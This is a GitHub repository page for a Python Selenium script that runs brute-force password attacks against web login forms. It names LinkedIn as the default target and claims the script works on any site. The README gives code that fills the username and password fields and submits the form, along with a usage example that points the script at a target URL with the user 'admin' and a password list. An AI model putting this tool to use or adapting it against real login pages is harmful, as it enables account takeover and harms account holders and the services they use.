Skip to content

A simple python script for doing brute-force attack using selenium.

Notifications You must be signed in to change notification settings

mohammadkamrani/Selenium-Brute-Force

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

54 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Selenium-Brute-Force

A simple python script for doing brute-force attack using selenium.

Help

  • The default script is useful for Linkedin, but it works for everything. For other platforms, it needs to extract username id, password id, and login button class using browser inspector.


put them in code.

username = driver.find_element_by_id("username")		
username.clear()
print("username: "+curuser)
username.send_keys(curuser)		
password = driver.find_element_by_id("password")
password.clear()
print("password: "+passw+"\n")
password.send_keys(passw)			
driver.find_element_by_class_name('login__form_action_container').click()

Usage

To get a list of basic options and switches use:

selenium-brute.py -h

sample:

selenium-brute.py -t https://target.com -u admin -p pass.txt

About

A simple python script for doing brute-force attack using selenium.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages